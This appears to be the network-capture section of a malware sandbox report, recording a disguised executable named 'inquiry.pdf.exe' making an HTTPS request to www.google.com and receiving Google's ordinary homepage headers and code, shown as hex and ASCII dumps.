                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            1192.168.2.349705142.250.203.100443C:\Users\user\Desktop\inquiry.pdf.exe
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            2022-10-03 15:29:37 UTC49OUTGET / HTTP/1.1
                                                                                                            Host: www.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2022-10-03 15:29:37 UTC49INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 03 Oct 2022 15:29:37 GMT
                                                                                                            Expires: -1
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                            Server: gws
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Set-Cookie: AEC=AakniGNQ0aWHKSJGKGXe0DAAaOX4_l-Eqw_hG98LPGEupVNMiOM9qqjZAQ; expires=Sat, 01-Apr-2023 15:29:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                            Set-Cookie: __Secure-ENID=7.SE=kri9G_HeJvoxasZM26R6sYp7LSr9aDkO6S0wljZkHLvB8nbu3LtM50X119R__W1bVC6hiPtbrmCsYtdSG6Y_9MQoxbtdaa5dsDbfVsZw2lMX5H0R-CQIXVXImZIXyCIr5GdU7ZARDQvtSt5HaoY8vOSLxYMAaZ8QiTAjB_KInh0; expires=Fri, 03-Nov-2023 07:47:55 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                            Set-Cookie: CONSENT=PENDING+104; expires=Wed, 02-Oct-2024 15:29:37 GMT; path=/; domain=.google.com; Secure
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                            Accept-Ranges: none
                                                                                                            Vary: Accept-Encoding
                                                                                                            Connection: close
                                                                                                            Transfer-Encoding: chunked
                                                                                                            2022-10-03 15:29:37 UTC50INData Raw: 35 35 32 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b
                                                                                                            Data Ascii: 552f<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html;
                                                                                                            2022-10-03 15:29:37 UTC50INData Raw: 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 58 5f 6e 4e 64 52 78 67 6f 57 68 50 69 33 6b 70 5f 50 41 70 38 41 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 7b 6b 45 49 3a 27 34 66 38 36 59 34 44 44 44 66 76 4b 31 73 51 50 39 4b 61 2d 2d 41 59 27 2c 6b 45
                                                                                                            Data Ascii: charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="X_nNdRxgoWhPi3kp_PAp8A">(function(){window.google={kEI:'4f86Y4DDDfvK1sQP9Ka--AY',kE
                                                                                                            2022-10-03 15:29:37 UTC51INData Raw: 36 34 2c 35 33 33 36 34 32 31 2c 36 39 39 2c 37 35 2c 31 36 2c 35 39 39 35 38 31 37 2c 31 36 2c 32 38 30 33 34 30 30 2c 33 33 31 31 2c 31 34 31 2c 37 39 35 2c 31 39 37 33 35 2c 31 2c 31 2c 33 34 36 2c 31 36 34 39 2c 35 2c 33 2c 33 2c 31 2c 31 2c 31 2c 39 30 2c 36 34 2c 31 33 2c 35 2c 35 2c 31 2c 33 2c 34 2c 37 34 35 31 37 37 36 2c 31 36 34 39 36 38 36 30 2c 34 37 30 2c 34 30 34 31 36 37 33 2c 31 39 36 34 2c 33 30 39 34 2c 31 33 35 37 39 2c 33 34 30 35 27 2c 6b 42 4c 3a 27 67 55 66 63 27 7d 3b 67 6f 6f 67 6c 65 2e 73 6e 3d 27 77 65 62 68 70 27 3b 67 6f 6f 67 6c 65 2e 6b 48 4c 3d 27 65 6e 2d 47 42 27 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 66 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 68 2c 6b 3d 5b 5d 3b 66 75 6e 63 74 69
                                                                                                            Data Ascii: 64,5336421,699,75,16,5995817,16,2803400,3311,141,795,19735,1,1,346,1649,5,3,3,1,1,1,90,64,13,5,5,1,3,4,7451776,16496860,470,4041673,1964,3094,13579,3405',kBL:'gUfc'};google.sn='webhp';google.kHL='en-GB';})();(function(){var f=this||self;var h,k=[];functi
                                                                                                            2022-10-03 15:29:37 UTC53INData Raw: 31 7d 3b 67 6f 6f 67 6c 65 2e 73 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 73 79 2e 70 75 73 68 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 6d 3d 5b 5d 3b 67 6f 6f 67 6c 65 2e 70 6c 6d 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 6c 6d 2e 70 75 73 68 2e 61 70 70 6c 79 28 67 6f 6f 67 6c 65 2e 6c 6d 2c 61 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 71 3d 5b 5d 3b 67 6f 6f 67 6c 65 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 5b 61 5d 2c 62 2c 63 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 62 78 3d 21 31 3b 67 6f 6f 67 6c 65 2e
                                                                                                            Data Ascii: 1};google.sx=function(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;google.
                                                                                                            2022-10-03 15:29:37 UTC54INData Raw: 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 39 70 78 3b 5f 68 65 69 67 68 74 3a 33 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 39 39 30 7d 23 67 62 78 33 7b 6c 65 66 74 3a 30 7d 23 67 62 78 34 7b 72 69 67 68 74 3a 30 7d 23 67 62 62 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 62 77 7b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 33 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 74
                                                                                                            Data Ascii: rder-bottom:1px solid #000;font-size:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbt
                                                                                                            2022-10-03 15:29:37 UTC55INData Raw: 6f 6c 69 64 20 64 61 73 68 65 64 20 64 61 73 68 65 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 33 70 78 20 33 70 78 20 30 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 70 78 3b 6c 65 66 74 3a 34 70 78 7d 23 67 62 7a 74 6d 73 31 2c 23 67 62 69 34 6d 31 2c 23 67 62 69 34 73 2c 23 67 62 69 34 74 7b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 63 2c 2e 67 62 6d 63 2c
                                                                                                            Data Ascii: olid dashed dashed;border-color:transparent;border-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,
                                                                                                            2022-10-03 15:29:37 UTC56INData Raw: 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 37 70 78 20 2d 32 32 70 78 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 30 20 30 3b 2a 70
                                                                                                            Data Ascii: ,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*p
                                                                                                            2022-10-03 15:29:37 UTC58INData Raw: 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72
                                                                                                            Data Ascii: iw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);backgr
                                                                                                            2022-10-03 15:29:37 UTC59INData Raw: 30 6c 2c 2e 67 62 6d 30 6c 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d
                                                                                                            Data Ascii: 0l,.gbm0l:visited{color:#000 !important;font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbm
                                                                                                            2022-10-03 15:29:37 UTC60INData Raw: 2e 67 62 6d 63 63 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 67 62 70 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 65 66 39 64 62 7d 2e 67 62 70 6d 63 20 2e 67 62 70 6d 74 63 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 7d 23 67 62 70 6d 7b 62 6f 72 64 65 72 3a 30 3b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 7d 23 67 62 70 6d 20 2e 67 62 70 6d 74 63 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77
                                                                                                            Data Ascii: .gbmcc{margin-top:5px}.gbpmc{background:#fef9db}.gbpmc .gbpmtc{padding:10px 20px}#gbpm{border:0;*border-collapse:collapse;border-spacing:0;margin:0;white-space:normal}#gbpm .gbpmtc{border-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*w
                                                                                                            2022-10-03 15:29:37 UTC61INData Raw: 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 7d 2e 67 62 71 66 62 3a 66 6f 63 75 73 2c 2e 67 62 71 66 62 61 3a 66 6f 63 75 73 2c 2e 67 62 71 66 62 62 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 34 64 39 30 66 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 35 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 35 29 3b 62 6f 78 2d 73 68 61 64 6f
                                                                                                            Data Ascii: none !important;-moz-user-select:none;-webkit-user-select:none}.gbqfb:focus,.gbqfba:focus,.gbqfbb:focus{border:1px solid #4d90fe;-moz-box-shadow:inset 0 0 0 1px rgba(255, 255, 255, 0.5);-webkit-box-shadow:inset 0 0 0 1px rgba(255, 255, 255, 0.5);box-shado
                                                                                                            2022-10-03 15:29:37 UTC62INData Raw: 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 34 37 38 37 65 64 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 34 37 38 37 65 64 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 34 37 38 37 65 64 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 34 64 39 30 66 65 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 34 37 38 37
                                                                                                            Data Ascii: ound-image:-ms-linear-gradient(top,#4d90fe,#4787ed);background-image:-o-linear-gradient(top,#4d90fe,#4787ed);background-image:linear-gradient(top,#4d90fe,#4787ed);filter:progid:DXImageTransform.Microsoft.gradient(startColorStr='#4d90fe',EndColorStr='#4787
                                                                                                            2022-10-03 15:29:37 UTC64INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 35 66 35 66 35 2c 23 66 31 66 31 66 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 35 66 35 66 35 2c 23 66 31 66 31 66 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 35 66 35 66 35 2c 23 66 31 66 31 66 31 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 66 35 66 35 66 35 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d
                                                                                                            Data Ascii: background-image:-ms-linear-gradient(top,#f5f5f5,#f1f1f1);background-image:-o-linear-gradient(top,#f5f5f5,#f1f1f1);background-image:linear-gradient(top,#f5f5f5,#f1f1f1);filter:progid:DXImageTransform.Microsoft.gradient(startColorStr='#f5f5f5',EndColorStr=
                                                                                                            2022-10-03 15:29:37 UTC65INData Raw: 3d 27 23 66 66 66 66 66 66 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 66 62 66 62 66 62 27 29 7d 2e 67 62 71 66 62 62 2d 68 76 72 2c 2e 67 62 71 66 62 62 2d 68 76 72 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 38 66 38 66 38 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 38 66 38 66 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c
                                                                                                            Data Ascii: ='#ffffff',EndColorStr='#fbfbfb')}.gbqfbb-hvr,.gbqfbb-hvr:active{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#f8f8f8));background-image:-webkit-linear-gradient(top,#fff,#f8f8f8);background-image:-moz-l
                                                                                                            2022-10-03 15:29:37 UTC66INData Raw: 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 73 62 20 2e 67 62 73 62 74 3a 61 66 74 65 72 2c 2e 67 62 73 62 20 2e 67 62 73 62 62 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 73 62 69 73 20 2e 67 62 73 62 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f
                                                                                                            Data Ascii: (1,rgba(0,0,0,.1)));left:0;margin-right:0;opacity:0;position:absolute;width:100%}.gbsb .gbsbt:after,.gbsb .gbsbb:after{content:"";display:block;height:0;left:0;position:absolute;width:100%}.gbsbis .gbsbt{background:-webkit-gradient(linear,left top,left bo
                                                                                                            2022-10-03 15:29:37 UTC67INData Raw: 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 6f 74 74 6f 6d 3a 30 3b 68 65 69 67 68 74 3a 34 70 78 7d 2e 67 62 73 62 20 2e 67 62 73 62 62 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 62 65 62 65 62 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 29 3b 62 6f 74 74 6f 6d 3a 30 7d 0a 3c 2f 73 74 79 6c 65 3e 3c 73
                                                                                                            Data Ascii: und-image:-o-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));background-image:linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));bottom:0;height:4px}.gbsb .gbsbb:after{border-bottom:1px solid #ebebeb;border-color:rgba(0,0,0,.3);bottom:0}</style><s
                                                                                                            2022-10-03 15:29:37 UTC69INData Raw: 72 69 66 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 6c 73 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 61 64 63 65 30 7d 2e 6c 73 74 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 58 5f 6e 4e 64 52 78 67 6f 57 68 50 69 33 6b 70 5f 50 41 70 38 41 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 65 72 64 3d 7b 6a 73 72 3a 31 2c 62 76 3a 31 36 36 34 2c 64 65 3a 74 72 75 65 7d 3b 0a 76 61 72 20 68 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 6b 2c 6c 3d 6e 75 6c 6c 21 3d 28 6b 3d 68 2e 6d 65 69 29 3f 6b 3a 31 2c 6e 2c 70 3d 6e 75 6c 6c 21 3d 28 6e 3d 68 2e 73 64 6f 29 3f 6e 3a 21 30 2c 71 3d 30 2c 72
                                                                                                            Data Ascii: rif;vertical-align:top}.lsb:active{background:#dadce0}.lst:focus{outline:none}</style><script nonce="X_nNdRxgoWhPi3kp_PAp8A">(function(){window.google.erd={jsr:1,bv:1664,de:true};var h=this||self;var k,l=null!=(k=h.mei)?k:1,n,p=null!=(n=h.sdo)?n:!0,q=0,r
                                                                                                            2022-10-03 15:29:37 UTC70INData Raw: 72 6f 72 3f 65 3a 45 72 72 6f 72 28 61 29 2c 76 6f 69 64 20 30 3d 3d 3d 64 7c 7c 22 6c 69 6e 65 4e 75 6d 62 65 72 22 69 6e 20 61 7c 7c 28 61 2e 6c 69 6e 65 4e 75 6d 62 65 72 3d 64 29 2c 76 6f 69 64 20 30 3d 3d 3d 62 7c 7c 22 66 69 6c 65 4e 61 6d 65 22 69 6e 20 61 7c 7c 28 61 2e 66 69 6c 65 4e 61 6d 65 3d 62 29 2c 67 6f 6f 67 6c 65 2e 6d 6c 28 61 2c 21 31 2c 76 6f 69 64 20 30 2c 21 31 2c 22 53 79 6e 74 61 78 45 72 72 6f 72 22 3d 3d 3d 61 2e 6e 61 6d 65 7c 7c 22 53 79 6e 74 61 78 45 72 72 6f 72 22 3d 3d 3d 61 2e 6d 65 73 73 61 67 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 31 31 29 7c 7c 30 3c 61 2e 6d 65 73 73 61 67 65 2e 69 6e 64 65 78 4f 66 28 22 53 63 72 69 70 74 20 65 72 72 6f 72 22 29 3f 32 3a 30 29 29 3b 72 3d 6e 75 6c 6c 3b 70 26 26 71 3e 3d 6c 26 26
                                                                                                            Data Ascii: ror?e:Error(a),void 0===d||"lineNumber"in a||(a.lineNumber=d),void 0===b||"fileName"in a||(a.fileName=b),google.ml(a,!1,void 0,!1,"SyntaxError"===a.name||"SyntaxError"===a.message.substring(0,11)||0<a.message.indexOf("Script error")?2:0));r=null;p&&q>=l&&
